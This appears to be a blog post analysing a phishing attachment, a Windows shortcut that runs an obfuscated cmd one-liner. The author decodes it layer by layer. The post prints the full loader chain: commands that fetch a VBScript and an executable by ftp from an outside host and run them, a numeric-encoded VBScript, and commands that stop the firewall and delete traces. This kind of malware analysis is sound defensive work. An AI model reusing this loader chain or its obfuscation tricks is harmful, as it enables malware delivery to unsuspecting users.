I received a phishing attack in my mail today. I wouldn't ordinarily have paid any attention, especially as it was attached to a message in Chinese, which I can't read without a dictionary and a grammar book (and not well then). But by chance it appeared to come from someone who has previously written to me in Chinese, and it was short enough that she might plausibly have intended me to puzzle it out. So the unintelligible message raised my suspicions only a little, and I looked at the attachment anyway. (Sure enough, the message turned out to be vague platitudes.)
It took a while for me to figure out that it was a phishing attack, not a virus. It was packaged as a Windows .LNK file — a shortcut — which ran a 245-character command beginning with:
%coMSpEc% /C sET s=o GAm &ECHO %V%%S%E0TW%x%^>K>w&eCHO %v%123^>^>K>>w&...
Sorry about the StUdLyCaPs — it was apparently written like that to make it look less like code. But what does it do?
%comspec% is usually
cmd /c some-command runs
& separates multiple commands to be run sequentially. So this is a script embedded in a one-line command. Case-folded and reformatted, it's:
set s=o gam echo %v%%s%e0tw%x%^>k >w echo %v%123^>^>k >>w echo %v%123^>^>k >>w echo %v%get c c.vbs ^>^>k >>w echo %v%by ^>^>k >>w echo %i%p%b%s:k >>w echo %f%art c.vbs >>w set b= - set i=ft set x=.com set v=echo ren w g.bat set f=st g.bat
This writes something to
w and then executes it.
^ escapes the following character, and
>> are the same as on Unix, so the contents of
w turn out to be:
%v%o game0tw%x% >k %v%123 >>k %v%123 >>k %v%get c c.vbs >>k %v%by >>k %i%p%b%s:k %f%art c.vbs
Substituting in the variables gives:
echo o game0tw.com >k echo 123 >>k echo 123 >>k echo get c c.vbs >>k echo by >>k ftp -s:k start c.vbs
So it's writing another file and executing it, although in this case the interpreter is
o game0tw.com 123 123 get c c.vbs by
123s are a username and password, which
ftp will prompt for.
c.vbs is (as of two hours later) still available; it contains (reformatted):
function o for i=1 to UBound(s) h=h&chr(s(i)-232) next Set qq = CreateObject("Wscript.Shell") qq.run h,0 end function s=array(245,331,341,332,264,279,331,264,342,333,348,264,347, 348,343,344,264,347,336,329,346,333,332,329,331,331, 333,347,347,270,333,331,336,343,264,343,264,335,329, 341,333,280,348,351,278,331,343,341,294,341,278,348, 352,348,270,333,331,336,343,264,281,282,283,294,294, 341,278,348,352,348,270,333,331,336,343,264,281,282, 283,294,294,341,278,348,352,348,270,333,331,336,343, 341,278,348,352,348,270,333,331,336,343,264,330,353, 333,294,294,341,278,348,352,348,270,334,348,344,264, 277,347,290,341,278,348,352,348,270,332,333,340,264, 341,278,348,352,348,270,333,278,333,352,333,270,329, 348,348,346,337,330,264,295,278,350,330,347,264,277, 346,270,332,333,340,264,295,264,295,278,330,329,348, 264,295,278,350,330,347,264,295,278,333,352,333,270, 270,347,348,329,346,348,264,336,348,348,344,290,279, 279,348,351,278,330,337,332,278,353,329,336,343,343, 278,331,343,341,279) o
Once the array is converted to a string,
h turns out to be another script embedded in a
cmd /c one-liner. This time the commands are:
net stop sharedaccess echo o game0tw.com >m.txt echo 123 >>m.txt echo 123 >>m.txt echo get e e.exe >>m.txt echo bye >>m.txt ftp -s:m.txt del m.txt e.exe attrib ?.vbs -r del ? ?.bat ?.vbs ?.exe start http://tw.bid.yahoo.com/
Looks familiar, no? Once again it writes a script for
ftp and fetches and runs a file. Despite being transferred in text mode,
e.exe turns out to be a 52736-byte executable. I won't try to understand it, but I think it's the payload rather than another level of obfuscatory packaging, because it imports a variety of suspicious Win32 functions, including
UnregisterClassW. I'm guessing it tries to replace something (part of a browser?) for phishing purposes. There is a suspicious shortage of strings other than the imports, though, which suggests it obfuscates its data internally. (It also calls
IsDebuggerPresent, presumably to inconvenience people who are trying to watch it run.)
But never mind the binary. Count the layers of obfuscatory packaging:
- Embedding a script in a command via
cmd /C ... & ... & ...(twice)
- StUdLyCaPs to escape case-sensitive code detectors
- Assembling strings out of several pieces
- Generating a script and then running it (four times)
- Representing text as an array of numbers
- Fetching code from elsewhere (twice)
- Fetching a binary in text mode, so ordinary attempts to download it will get a corrupted version.
That's some impressive depth of defense. I'm tempted to dismiss it as a waste of effort, since none of the layers are much trouble by themselves. But it did get past my virus scanner.